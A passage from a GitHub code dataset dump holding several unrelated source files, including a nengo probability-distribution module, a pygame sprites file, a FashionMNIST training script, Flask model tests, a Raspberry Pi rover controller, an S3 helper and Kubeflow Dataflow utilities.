IntParam(\"n\", low=0)\n m = IntParam(\"m\", low=0)\n\n def 
__init__(self, n, m=1):\n super().__init__()\n self.n = n\n self.m = m\n\n def sample(self, num, d=None, rng=np.random):\n shape = self._sample_shape(num, d)\n return np.sqrt(rng.beta(self.m / 2.0, self.n / 2.0, size=shape))\n\n def cdf(self, x):\n \"\"\"Cumulative distribution function.\n\n .. note:: Requires SciPy.\n\n Parameters\n ----------\n x : array_like\n Evaluation points in [0, 1].\n\n Returns\n -------\n cdf : array_like\n Probability that ``X <= x``.\n \"\"\"\n from scipy.special import betainc # pylint: disable=import-outside-toplevel\n\n sq_x = x * x\n return np.where(\n sq_x < 1.0, betainc(self.m / 2.0, self.n / 2.0, sq_x), np.ones_like(x)\n )\n\n def pdf(self, x):\n \"\"\"Probability distribution function.\n\n .. note:: Requires SciPy.\n\n Parameters\n ----------\n x : array_like\n Evaluation points in [0, 1].\n\n Returns\n -------\n pdf : array_like\n Probability density at ``x``.\n \"\"\"\n from scipy.special import beta # pylint: disable=import-outside-toplevel\n\n return (\n 2\n / beta(0.5 * self.m, 0.5 * self.n)\n * x ** (self.m - 1)\n * (1 - x * x) ** (0.5 * self.n - 1)\n )\n\n def ppf(self, y):\n \"\"\"Percent point function (inverse cumulative distribution).\n\n .. note:: Requires SciPy.\n\n Parameters\n ----------\n y : array_like\n Cumulative probabilities in [0, 1].\n\n Returns\n -------\n ppf : array_like\n Evaluation points ``x`` in [0, 1] such that ``P(X <= x) = y``.\n \"\"\"\n from scipy.special import betaincinv # pylint: disable=import-outside-toplevel\n\n sq_x = betaincinv(self.m / 2.0, self.n / 2.0, y)\n return np.sqrt(sq_x)\n\n\nclass SubvectorLength(SqrtBeta):\n \"\"\"Distribution of the length of a subvectors of a unit vector.\n\n Parameters\n ----------\n dimensions : int\n Dimensionality of the complete unit vector.\n subdimensions : int, optional\n Dimensionality of the subvector.\n\n See also\n --------\n nengo.dists.SqrtBeta\n \"\"\"\n\n def __init__(self, dimensions, subdimensions=1):\n super().__init__(dimensions - subdimensions, subdimensions)\n\n @property\n def dimensions(self):\n return self.n + self.m\n\n @property\n def subdimensions(self):\n return self.m\n\n\nclass CosineSimilarity(SubvectorLength):\n \"\"\"Distribution of the cosine of the angle between two random vectors.\n\n The \"cosine similarity\" is the cosine of the angle between two vectors,\n which is equal to the dot product of the vectors, divided by the L2-norms\n of the individual vectors. When these vectors are unit length, this is then\n simply the distribution of their dot product.\n\n This is also equivalent to the distribution of a single coefficient from a\n unit vector (a single dimension of ``UniformHypersphere(surface=True)``).\n Furthermore, ``CosineSimilarity(d+2)`` is equivalent to the distribution of\n a single coordinate from points uniformly sampled from the d-dimensional\n unit ball (a single dimension of\n ``UniformHypersphere(surface=False).sample(n, d)``). These relationships\n have been detailed in [Voelker2017]_.\n\n This can be used to calculate an intercept ``c = ppf(1 - p)`` such that\n ``dot(u, v) >= c`` with probability ``p``, for random unit vectors ``u``\n and ``v``. In other words, a neuron with intercept ``ppf(1 - p)`` will\n fire with probability ``p`` for a random unit length input.\n\n .. [Voelker2017]\n `Aaron R. Voelker, Jan Gosmann, and Terrence C. Stewart.\n Efficiently sampling vectors and coordinates from the n-sphere and\n n-ball. 
Technical Report, Centre for Theoretical Neuroscience,\n Waterloo, ON, 2017\n `_\n\n Parameters\n ----------\n dimensions: int\n Dimensionality of the complete unit vector.\n\n See also\n --------\n nengo.dists.SqrtBeta\n \"\"\"\n\n def __init__(self, dimensions):\n super().__init__(dimensions)\n\n def sample(self, num, d=None, rng=np.random):\n shape = self._sample_shape(num, d)\n sign = Choice((1, -1)).sample(np.prod(shape), rng=rng).reshape(*shape)\n return sign * super().sample(num, d, rng=rng)\n\n def cdf(self, x):\n return (super().cdf(x) * np.sign(x) + 1) / 2.0\n\n def pdf(self, x):\n return super().pdf(x) / 2.0\n\n def ppf(self, y):\n x = super().ppf(abs(y * 2 - 1))\n return np.where(y > 0.5, x, -x)\n\n\nclass DistributionParam(Parameter):\n \"\"\"A Distribution.\"\"\"\n\n equatable = True\n\n def coerce(self, instance, dist):\n self.check_type(instance, dist, Distribution)\n return super().coerce(instance, dist)\n\n\nclass DistOrArrayParam(NdarrayParam):\n \"\"\"Can be a Distribution or samples from a distribution.\"\"\"\n\n def __init__(\n self,\n name,\n default=Unconfigurable,\n sample_shape=None,\n sample_dtype=np.float64,\n optional=False,\n readonly=None,\n ):\n super().__init__(\n name=name,\n default=default,\n shape=sample_shape,\n dtype=sample_dtype,\n optional=optional,\n readonly=readonly,\n )\n\n def coerce(self, instance, distorarray):\n if isinstance(distorarray, Distribution):\n return Parameter.coerce(self, instance, distorarray)\n return super().coerce(instance, distorarray)\n","repo_name":"Kanaderu/Neural-Networks","sub_path":"nengo-master/nengo/dists.py","file_name":"dists.py","file_ext":"py","file_size_in_byte":19847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23422358801","text":"from basic import *\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Opponent(Sprite):\r\n CLR = (10, 10, 10)\r\n IMG_PATH = \"images/opponents/opponent.png\"\r\n SIZE = Size(CAR_W, CAR_L)\r\n SIDE_MIRROR = 15\r\n\r\n EVENT = 4\r\n T_RANGE = 1500, 2500\r\n\r\n def __init__(self, screen, pos, speed):\r\n super().__init__(screen, pos, self.SIZE, self.CLR)\r\n self.speed = speed\r\n\r\n self.img = pygame.image.load(self.IMG_PATH).convert()\r\n image_size = Size(self.img.get_width(), self.img.get_height())\r\n image_scale = image_size.get_scale()\r\n self.size.h = self.size.w // image_scale - 3\r\n self.img = pygame.transform.scale(self.img, (self.size.w, self.size.h))\r\n self.img.set_colorkey((0, 0, 0))\r\n\r\n def draw(self):\r\n self.screen.blit(self.img, (self.pos.x-self.size.w/2, self.pos.y-self.size.h/2))\r\n\r\n def update(self, div_speed):\r\n self.pos.y -= self.speed - div_speed\r\n\r\n def left_corner(self):\r\n return self.pos.x - self.size.w // 2 + self.SIDE_MIRROR\r\n\r\n def right_corner(self):\r\n return self.pos.x + self.size.w // 2 - self.SIDE_MIRROR\r\n\r\n\r\nclass Bullet(Sprite):\r\n CLR = (255, 255, 255)\r\n IMG_PATH = \"images/bullets/vib_bullet.jpg\"\r\n SOUND_PATH = \"sounds/bullet.mp3\"\r\n SIZE = Size(5, 10)\r\n SPEED = 3\r\n\r\n def __init__(self, screen, pos):\r\n super().__init__(screen, pos, self.SIZE, self.CLR)\r\n\r\n self.sound = pygame.mixer.Sound(self.SOUND_PATH)\r\n pygame.mixer.Sound.play(self.sound)\r\n\r\n self.img = pygame.image.load(self.IMG_PATH).convert()\r\n image_size = Size(self.img.get_width(), self.img.get_height())\r\n image_scale = image_size.get_scale()\r\n self.size.h = self.size.w / image_scale\r\n self.img = pygame.transform.scale(self.img, (self.size.w, self.size.h))\r\n 
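# pure white is used as the colorkey below, so the bullet's background renders transparent\r\n 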
self.img.set_colorkey((255, 255, 255))\r\n\r\n def draw(self):\r\n self.screen.blit(self.img, (self.pos.x-self.size.w/2, self.pos.y-self.size.h/2))\r\n\r\n def update(self, div_speed):\r\n self.pos.y -= self.SPEED + div_speed\r\n\r\n\r\nclass Victim(Sprite):\r\n CLR = (255, 10, 10)\r\n SIZE = Size(125, 125)\r\n\r\n EVENT = 3\r\n T_RANGE = 5000, 10000\r\n\r\n def __init__(self, screen, pos, img_path):\r\n super().__init__(screen, pos, deepcopy(self.SIZE), self.CLR)\r\n self.img_path = img_path\r\n self.img_unscaled = pygame.image.load(img_path).convert()\r\n image_size = Size(self.img_unscaled.get_width(), self.img_unscaled.get_height())\r\n image_scale = image_size.get_scale()\r\n self.size.w = self.size.h * image_scale // 2\r\n self.img = pygame.transform.scale(self.img_unscaled, (self.size.w*2, self.size.h))\r\n\r\n self.alpha = 255\r\n self.img.set_alpha(self.alpha)\r\n\r\n self.area = 0, 0, self.size.w, self.size.h\r\n self.transforming = False\r\n\r\n def draw(self):\r\n self.screen.blit(self.img, (self.pos.x-self.size.w/2, self.pos.y-self.size.h/2), self.area)\r\n\r\n def transform(self):\r\n self.transforming = True\r\n\r\n def update(self, div_speed):\r\n self.pos.y += div_speed\r\n\r\n if self.transforming:\r\n self.alpha -= self.size.w//25\r\n if self.alpha <= 0:\r\n self.alpha = 0\r\n else:\r\n self.size.increase(5)\r\n self.area = self.size.w, 0, self.size.w * 2, self.size.h\r\n self.img = pygame.transform.scale(self.img_unscaled, (self.size.w * 2, self.size.h))\r\n self.img.set_alpha(self.alpha)\r\n self.img.convert_alpha()\r\n\r\n\r\n","repo_name":"dosAidos/grand-prix","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27251296616","text":"\"\"\"\n文件名: Code/Chapter05/C03_TensorboardUsage/main.py\n创建时间: 2023/3/4 7:01 下午\n作 者: @空字符\n公众号: @月来客栈\n知 乎: @月来客栈 https://www.zhihu.com/people/the_lastest\n\"\"\"\n\nimport torchvision.transforms as transforms\nfrom torchvision.datasets import FashionMNIST\nfrom torch.utils.data import DataLoader\nfrom transformers import get_cosine_schedule_with_warmup\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch\nimport sys\nimport logging\n\nsys.path.append(\"../../\")\nfrom Chapter04.C03_LeNet5.LeNet5 import LeNet5\nfrom Chapter05.C02_LogManage.log_manage import logger_init\nimport tensorflow as tf\nimport tensorboard as tb\n\ntf.io.gfile = tb.compat.tensorflow_stub.io.gfile\n\ntext_labels = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat',\n 'sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']\n\n\ndef load_dataset(batch_size=64):\n fashion_train = FashionMNIST(root='~/Datasets/FashionMNIST', train=True,\n download=True, transform=transforms.ToTensor())\n fashion_test = FashionMNIST(root='~/Datasets/FashionMNIST', train=False,\n download=True, transform=transforms.ToTensor())\n train_iter = DataLoader(fashion_train, batch_size=batch_size, shuffle=True)\n test_iter = DataLoader(fashion_test, batch_size=batch_size, shuffle=True)\n return train_iter, test_iter\n\n\nclass ModelConfig(object):\n def __init__(self,\n batch_size=64,\n epochs=3,\n learning_rate=0.01):\n self.batch_size = batch_size\n self.epochs = epochs\n self.learning_rate = learning_rate\n self.summary_writer_dir = \"runs/lenet5\"\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n logger_init(log_file_name='lenet5', log_level=logging.INFO, log_dir='log')\n logging.info(\" ### 将当前配置打印到日志文件中 
\")\n for key, value in self.__dict__.items():\n logging.info(f\"### {key} = {value}\")\n\n\ndef train(config):\n train_iter, test_iter = load_dataset(config.batch_size)\n model = LeNet5()\n num_training_steps = len(train_iter) * config.epochs\n optimizer = torch.optim.Adam([{\"params\": model.parameters(),\n \"initial_lr\": config.learning_rate}])\n scheduler = get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=300,\n num_training_steps=num_training_steps,\n num_cycles=2)\n writer = SummaryWriter(config.summary_writer_dir)\n model = model.to(config.device)\n model.train()\n for epoch in range(config.epochs):\n for i, (x, y) in enumerate(train_iter):\n x, y = x.to(config.device), y.to(config.device)\n loss, logits = model(x, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step() # 执行梯度下降\n scheduler.step()\n if i % 50 == 0:\n acc = (logits.argmax(1) == y).float().mean()\n logging.info(f\"Epochs[{epoch + 1}/{config.epochs}]--batch[{i}/{len(train_iter)}]\"\n f\"--Acc: {round(acc.item(), 4)}--loss: {round(loss.item(), 4)}\")\n writer.add_scalar('Training/Accuracy', acc, scheduler.last_epoch)\n writer.add_scalar('Training/Loss', loss.item(), scheduler.last_epoch)\n writer.add_scalar('Training/Learning Rate', scheduler.get_last_lr()[0], scheduler.last_epoch)\n\n test_acc, all_logits, y_labels, label_img = evaluate(test_iter, model, config.device)\n logging.info(f\"Epochs[{epoch + 1}/{config.epochs}]--Acc on test {test_acc}\")\n writer.add_scalar('Testing/Accuracy', test_acc, scheduler.last_epoch)\n writer.add_embedding(mat=all_logits, # 所有点\n metadata=y_labels, # 标签名称\n label_img=label_img, # 标签图片\n global_step=scheduler.last_epoch)\n return model\n\n\ndef evaluate(data_iter, model, device):\n model.eval()\n all_logits = []\n y_labels = []\n images = []\n with torch.no_grad():\n acc_sum, n = 0.0, 0\n for x, y in data_iter:\n x, y = x.to(device), y.to(device)\n logits = model(x)\n acc_sum += (logits.argmax(1) == y).float().sum().item()\n n += len(y)\n all_logits.append(logits)\n y_pred = logits.argmax(1).view(-1)\n y_labels += (text_labels[i] for i in y_pred)\n images.append(x)\n return acc_sum / n, torch.cat(all_logits, dim=0), y_labels, torch.cat(images, dim=0)\n\n\ndef inference(model, fashion_test):\n y_true = fashion_test.targets[:5]\n imgs = fashion_test.data[:5].unsqueeze(1).to(torch.float32)\n with torch.no_grad():\n logits = model(imgs)\n y_pred = logits.argmax(1)\n print(f\"真实标签为:{y_true}\")\n print(f\"预测标签为:{y_pred}\")\n\n\nif __name__ == '__main__':\n config = ModelConfig()\n model = train(config)\n","repo_name":"moon-hotel/DeepLearningWithMe","sub_path":"Code/Chapter05/C03_TensorboardUsage/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"6"} +{"seq_id":"74552756666","text":"\"\"\"Message model tests.\"\"\"\n\nimport os\nfrom unittest import TestCase\nfrom sqlalchemy.exc import IntegrityError\nfrom models import db, User, Message, Like\n\n# Environmental variable for URL\nos.environ['DATABASE_URL'] = \"postgresql:///warbler_test\"\n\nfrom app import app\n\n# Create tables: once for all tests\ndb.drop_all()\ndb.create_all()\n\n\nclass MessageModelTestCase(TestCase):\n def setUp(self):\n \"\"\"Create demo data\"\"\"\n\n User.query.delete()\n\n u1 = User.signup(\n username=\"u1\",\n email=\"u1@email.com\",\n password=\"password\",\n image_url=None\n )\n\n u2 = User.signup(\n username=\"u2\",\n email=\"u2@email.com\",\n password=\"password\",\n 
image_url=None\n )\n\n m1 = Message(text=\"Sample text\")\n u1.authored_messages.append(m1)\n db.session.commit()\n\n self.u1_id = u1.id\n self.u2_id = u2.id\n self.m1_id = m1.id\n\n self.client = app.test_client()\n\n def tearDown(self):\n \"\"\"Clean up fouled transactions\"\"\"\n\n db.session.rollback()\n\n ########################################################################\n # Message model tests\n\n def test_message_model(self):\n \"\"\"Test message model with demo data\"\"\"\n\n u1 = User.query.get(self.u1_id)\n u2 = User.query.get(self.u2_id)\n\n # u1 should have 1 message\n self.assertEqual(len(u1.authored_messages), 1)\n self.assertEqual(u1.authored_messages[0].text, \"Sample text\")\n self.assertEqual(len(u2.authored_messages), 0)\n\n def test_message_model_invalid_message(self):\n \"\"\"Test message without text fails to create message\"\"\"\n\n with self.assertRaises(ValueError):\n msg = Message(text=\"\", user_id=self.u1_id)\n\n db.session.add(msg)\n db.session.commit()\n\n def test_message_model_invalid_author(self):\n \"\"\"Test author who does not exist fails to create message\"\"\"\n\n with self.assertRaises(IntegrityError):\n msg = Message(text=\"Sample Text\", user_id=1000)\n\n db.session.add(msg)\n db.session.commit()\n\n ########################################################################\n # authored_messages/author tests\n\n def test_message_author(self):\n \"\"\"Test that message has the expected author\"\"\"\n\n m1 = Message.query.get(self.m1_id)\n u1 = User.query.get(self.u1_id)\n\n self.assertEqual(m1.author, u1)\n self.assertEqual(u1.authored_messages, [m1])\n\n ########################################################################\n # Message likes tests\n\n def test_message_likes_valid(self):\n \"\"\"\n Test that a message has expected list of users_who_like, and user has\n expected list of liked_messages\n \"\"\"\n\n u2 = User.query.get(self.u2_id)\n msg = Message.query.get(self.m1_id)\n like = Like(user_id=self.u2_id, message_id=self.m1_id)\n\n db.session.add(like)\n db.session.commit()\n\n self.assertEqual(msg.users_who_liked, [u2])\n self.assertEqual(u2.liked_messages, [msg])\n\n def test_message_likes_invalid_user(self):\n \"\"\"\n Test that a message will not accept like from user who does not exist\n \"\"\"\n\n with self.assertRaises(IntegrityError):\n like = Like(user_id=1000, message_id=self.m1_id)\n db.session.add(like)\n db.session.commit()\n\n def test_message_likes_invalid_message(self):\n \"\"\"\n Test that a user cannot like a message that does not exist\n \"\"\"\n\n with self.assertRaises(IntegrityError):\n like = Like(user_id=self.u2_id, message_id=1000)\n db.session.add(like)\n db.session.commit()","repo_name":"ari-denary/warbler","sub_path":"test_message_model.py","file_name":"test_message_model.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33291016429","text":"# boolean logic for sensor1/2.when_line does not seem to work. 
I'm not sure why\n\n\nfrom gpiozero import LineSensor\nimport RPi.GPIO as GPIO\nfrom time import sleep\nx = 75\nx1 = 0\nx2 = 100\nt = 0.25\n#Left sensor\nsensor1 = LineSensor(26)\n#Right sensor\nsensor2 = LineSensor(16)\nenA = 25\nenB = 12\n#Left motor - motor1\nin1 = 24\nin2 = 23\n#Right motor - motor2\nin3 = 20\nin4 = 21\n\nGPIO.setmode(GPIO.BCM)\n#motor 1\nGPIO.setup(in1,GPIO.OUT)\nGPIO.setup(in2,GPIO.OUT)\nGPIO.setup(enA,GPIO.OUT)\np1 = GPIO.PWM(enA,1000)\np1.start(25)\n#motor 2\nGPIO.setup(in3,GPIO.OUT)\nGPIO.setup(in4,GPIO.OUT)\nGPIO.setup(enB,GPIO.OUT)\np2 = GPIO.PWM(enB,1000)\np2.start(25)\n\n#Movement commands\ndef forward():\n print(\"going forwards\")\n p1.ChangeDutyCycle(x)\n p2.ChangeDutyCycle(x)\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.HIGH)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.HIGH)\ndef turn_left():\n print(\"turning left\")\n p1.ChangeDutyCycle(x1)\n p2.ChangeDutyCycle(x2)\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.HIGH)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.LOW)\ndef turn_right():\n print(\"turning right\")\n p1.ChangeDutyCycle(x2)\n p2.ChangeDutyCycle(x1)\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.LOW)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.HIGH)\ndef stop():\n print(\"stopping\")\n GPIO.output(in3,GPIO.LOW)\n GPIO.output(in4,GPIO.LOW)\n GPIO.output(in1,GPIO.LOW)\n GPIO.output(in2,GPIO.LOW)\n\n#Sensor commands\ndef stay_on_line():\n print(\"staying on line\")\n forward()\n\n\ndef straighten():\n print(\"straightening\")\n stop()\n sleep(t)\n #if sensor1.when_line == True:\n turn_right()\n sleep(t)\n stop()\n sleep(t)\n #elif sensor2.when_line == True:\n turn_left()\n sleep(t)\n stop()\n sleep(t)\n \n\nprint(\"starting\")\n#stop()\n#sleep(1)\n#Needs both sensors bright to move forward \n#if sensor1.when_line == True and sensor2.when_line == True:\n #stay_on_line()\n \n#Needs only one sensor to go dark to straighten \n#sensor1.when_line = stay_on_line\nsensor1.when_no_line = straighten\n#sensor2.when_line = stay_on_line\nsensor2.when_no_line = straighten\ntry:\n # Repeat the next indented block forever\n while True:\n sleep(10)\n\n# If you press CTRL+C, cleanup and stop\nexcept KeyboardInterrupt:\n print(\"Exiting\")\n stop()\n","repo_name":"2062GlossyLedge/Rover-projects","sub_path":"autonomous rover #3/a3_rover2_2.py","file_name":"a3_rover2_2.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75113973946","text":"from timeit import default_timer as timer\nimport re\n\nfile = open('input.txt')\n\npattern = r\"(?P\\d+)x(?P\\d+)x(?P\\d+)\";\nresult = 0\nstart = timer()\nfor line in file.readlines():\n\tmatches = re.match(pattern, line)\n\tdata = matches.groupdict();\n\n\tl = int(data[\"l\"])\n\tw = int(data[\"w\"])\n\th = int(data[\"h\"])\n\n\tdims = [l,w,h]\n\tdims.sort()\n\n\tresult += 2 * dims[0] + 2 * dims[1] + l * w * h\n\nprint(\"Completed in %fms\" % ((timer() - start) * 1000))\nprint(\"%d ft\" % result)","repo_name":"kmckenna525/advent-of-code","sub_path":"2015/day02/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"15521239692","text":"from collections import deque\n\ncache = deque() # allows for delay\nreg = 1\nclock = -1\ninteresting = [20, 60, 100, 140, 180, 220]\nint_val = []\nscreen = [[] for _ in range(6)]\nwith open(\"input\", \"r\") as file:\n\t# for line in 
iter(file.readline, ''):\n\twhile clock < 239:\n\t\tclock += 1\n\t\tif (clock % 40) <= reg+1 and (clock % 40) >= reg-1:\n\t\t\tscreen[clock // 40].append('#')\n\t\telse:\n\t\t\tscreen[clock // 40].append('.')\n\t\tif cache: # if cache has stuff\n\t\t\treg += cache.popleft()\n\t\telse:\n\t\t\tcmd = file.readline().rstrip().split()\n\t\t\t# if cmd[0] == 'noop': # don't do anything, let clock tick\n\t\t\tif cmd[0] == 'addx':\n\t\t\t\tcache.append(int(cmd[1]))\n\nfor line in screen:\n\tprint(''.join(line))\n","repo_name":"probablyanasian/advent-of-code","sub_path":"2022/10/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71969307069","text":"import logging\nimport time\nimport json\nimport os\nimport tempfile\n\nfrom kfp_component.core import display\nfrom .. import common as gcp_common\nfrom ..storage import download_blob, parse_blob_path, is_gcs_path\n\n_JOB_SUCCESSFUL_STATES = ['JOB_STATE_DONE', 'JOB_STATE_UPDATED', 'JOB_STATE_DRAINED']\n_JOB_FAILED_STATES = ['JOB_STATE_STOPPED', 'JOB_STATE_FAILED', 'JOB_STATE_CANCELLED']\n_JOB_TERMINATED_STATES = _JOB_SUCCESSFUL_STATES + _JOB_FAILED_STATES\n\ndef wait_for_job_done(df_client, project_id, job_id, location=None, wait_interval=30):\n while True:\n job = df_client.get_job(project_id, job_id, location=location)\n state = job.get('currentState', None)\n if is_job_done(state):\n return job\n elif is_job_terminated(state):\n # Terminated with error state\n raise RuntimeError('Job {} failed with error state: {}.'.format(\n job_id,\n state\n ))\n else:\n logging.info('Job {} is in pending state {}.'\n ' Waiting for {} seconds for next poll.'.format(\n job_id,\n state,\n wait_interval\n ))\n time.sleep(wait_interval)\n\ndef wait_and_dump_job(df_client, project_id, location, job, \n wait_interval):\n display_job_link(project_id, job)\n job_id = job.get('id')\n job = wait_for_job_done(df_client, project_id, job_id, \n location, wait_interval)\n dump_job(job)\n return job\n\ndef is_job_terminated(job_state):\n return job_state in _JOB_TERMINATED_STATES\n\ndef is_job_done(job_state):\n return job_state in _JOB_SUCCESSFUL_STATES\n\ndef display_job_link(project_id, job):\n location = job.get('location')\n job_id = job.get('id')\n display.display(display.Link(\n href = 'https://console.cloud.google.com/dataflow/'\n 'jobsDetail/locations/{}/jobs/{}?project={}'.format(\n location, job_id, project_id),\n text = 'Job Details'\n ))\n\ndef dump_job(job):\n gcp_common.dump_file('/tmp/kfp/output/dataflow/job.json', json.dumps(job))\n gcp_common.dump_file('/tmp/kfp/output/dataflow/job_id.txt', job.get('id'))\n\ndef stage_file(local_or_gcs_path):\n if not is_gcs_path(local_or_gcs_path):\n return local_or_gcs_path\n _, blob_path = parse_blob_path(local_or_gcs_path)\n file_name = os.path.basename(blob_path)\n local_file_path = os.path.join(tempfile.mkdtemp(), file_name)\n download_blob(local_or_gcs_path, local_file_path)\n return local_file_path\n\ndef get_staging_location(staging_dir, context_id):\n if not staging_dir:\n return None\n\n staging_location = os.path.join(staging_dir, context_id)\n logging.info('staging_location: {}'.format(staging_location))\n return staging_location\n\ndef read_job_id_and_location(storage_client, staging_location):\n if staging_location:\n job_blob = _get_job_blob(storage_client, staging_location)\n if job_blob.exists():\n job_data = job_blob.download_as_string().decode().split(',')\n # Returns (job_id, 
location)\n logging.info('Found existing job {}.'.format(job_data))\n return (job_data[0], job_data[1])\n\n return (None, None)\n\ndef upload_job_id_and_location(storage_client, staging_location, job_id, location):\n if not staging_location:\n return\n if not location:\n location = ''\n data = '{},{}'.format(job_id, location)\n job_blob = _get_job_blob(storage_client, staging_location)\n logging.info('Uploading {} to {}.'.format(data, job_blob))\n job_blob.upload_from_string(data)\n\ndef _get_job_blob(storage_client, staging_location):\n bucket_name, staging_blob_name = parse_blob_path(staging_location)\n job_blob_name = os.path.join(staging_blob_name, 'kfp/dataflow/launch_python/job.txt')\n bucket = storage_client.bucket(bucket_name)\n return bucket.blob(job_blob_name)","repo_name":"kubeflow/kfp-tekton-backend","sub_path":"components/gcp/container/component_sdk/python/kfp_component/google/dataflow/_common_ops.py","file_name":"_common_ops.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"73769959226","text":"import math\nimport random\n\nmature_rRNA_classes = [\"5.8s\", \"18s\", \"28s\", \"5s\"]\npremature_rRNA_classes = [\"45s pre-ribosomal RNA\"]\nrRNA_classes = mature_rRNA_classes + premature_rRNA_classes\n\nclass RibosomalRNA:\n '''\n Load rRNA data and allow creation of rRNA samples.\n '''\n def __init__(self, logfile, parameters):\n self.fasta = self.read_fasta(parameters[\"rRNA_fasta_file\"])\n\n for rRNA in rRNA_classes:\n assert rRNA in self.fasta, f\"rRNA FASTA file {parameters['rRNA_fasta_file']} must contain a '{rRNA}' entry\"\n\n\n # The percentage of the rRNA that is mature (versus just the pre-ribosomal RNA\n self.percent_mature = parameters[\"percent_mature\"]\n\n def generate_rRNA_sample(self, num_molecules):\n ''' returns a sample of size `num_molcules` of sequences of\n un-degraded rRNA molecules '''\n\n num_mature = math.floor(self.percent_mature * num_molecules)\n num_premature = num_molecules - num_mature\n\n sample = []\n for i in range(num_mature):\n rRNA_class = mature_rRNA_classes[random.randrange(len(mature_rRNA_classes))]\n sample.append( self.fasta[rRNA_class] )\n\n for j in range(num_premature):\n rRNA_class = premature_rRNA_classes[random.randrange(len(premature_rRNA_classes))]\n sample.append( self.fasta[rRNA_class] )\n\n return sample\n\n def read_fasta(self, filename):\n ''' load a fasta file as a dictionary of description:sequence pairs '''\n fasta_file = open(filename, \"r\")\n\n entries = {}\n current_entry_description = None\n current_entry = None\n for line in fasta_file:\n if line.startswith(\">\"):\n if current_entry is not None:\n entries[current_entry_description] = ''.join(current_entry)\n\n current_entry_description = line[1:-1] #remove '>' and newline\n current_entry = []\n else:\n if current_entry is None:\n raise Exception(\"FASTA file has no description line\")\n \n current_entry.append(line[:-1]) #remove newline\n\n if current_entry is not None:\n entries[current_entry_description] = ''.join(current_entry)\n\n return entries\n\nif __name__ == '__main__':\n rRNA = RibosomalRNA(logfile = None,\n parameters = dict(percent_mature = 0.9,\n rRNA_fasta_file = \"../../data/mm9/rRNA.fa\"))\n\n rRNA_sample = rRNA.generate_rRNA_sample(100)\n print(f\"Generated {len(rRNA_sample)} rRNA molecules\")\n print(f\"The first ten are: 
{rRNA_sample[:10]}\")\n","repo_name":"itmat/CAMPAREE","sub_path":"camparee/rRNA.py","file_name":"rRNA.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"28575691332","text":"import boto3\nfrom decouple import config\n\nclass S3Client:\n def __init__(self):\n self.s3 = boto3.resource('s3', aws_access_key_id=config('S3_ACCESS_KEY_ID'), aws_secret_access_key=config('S3_ACCESS_SECRET_KEY'))\n self.s3_bucket = self.s3.Bucket(config('S3_BUCKET_NAME'))\n self.s3_client = boto3.client('s3')\n self.bucket_name = config('S3_BUCKET_NAME')\n \n \n def upload(self, file, filename, folder=\"raw\"):\n self.s3_bucket.put_object(\n Key=f\"{folder}/{filename}\",\n Body=file\n )\n \n def getAllFilenames(self, folder=\"raw\"):\n audio_files = []\n folder_filter = f\"{folder}/\"\n for audio in self.s3_bucket.objects.filter(Prefix=folder_filter):\n audio_files.append(audio.key)\n \n return audio_files[1:]\n \n def retrieveAudioFiles(self, folder=\"raw\"):\n audio_files = self.getAllFilenames(folder) \n raw_files = []\n\n for file in audio_files:\n obj = self.s3.Object(self.bucket_name, file)\n content = obj.get()['Body'].read() \n \n raw_files.append((file, content)) \n \n return raw_files\n \n def getContents(self, key):\n fileObject = self.s3.Object(self.bucket_name, key)\n \n return fileObject.get()['Body']\n \n \n \n \n \n ","repo_name":"jdang4/AudioConverter","sub_path":"S3Client.py","file_name":"S3Client.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15412254230","text":"import json\nimport numpy as np\nimport random\nimport math\nimport re\nimport sys\nimport torch\nfrom torchtext import data, datasets\n\nsys.path.append('../../sni/model')\nimport model\nimport evalTest\n\ndef main():\n\n # LOAD DATA\n jsondata = json.loads(open('./Math23K.json').read())\n\n # LOAD SNI MODEL\n model = torch.load('../../sni/models/sni_best_model.pt')\n if int(torch.cuda.is_available()) == 1:\n model = model.cuda()\n print(model)\n\n #if model.model.gru.flatten_parameters()\n model.lstm.flatten_parameters()\n model.eval()\n TEXT = data.Field(lower=True,init_token=\"\",eos_token=\"\")\n LABEL = data.Field(sequential=False)\n\n fields = [('text', TEXT), ('label', LABEL)]\n train = data.TabularDataset(path='../../sni/data/train.tsv', format='tsv', fields=fields)\n TEXT.build_vocab(train)\n LABEL.build_vocab(train)\n 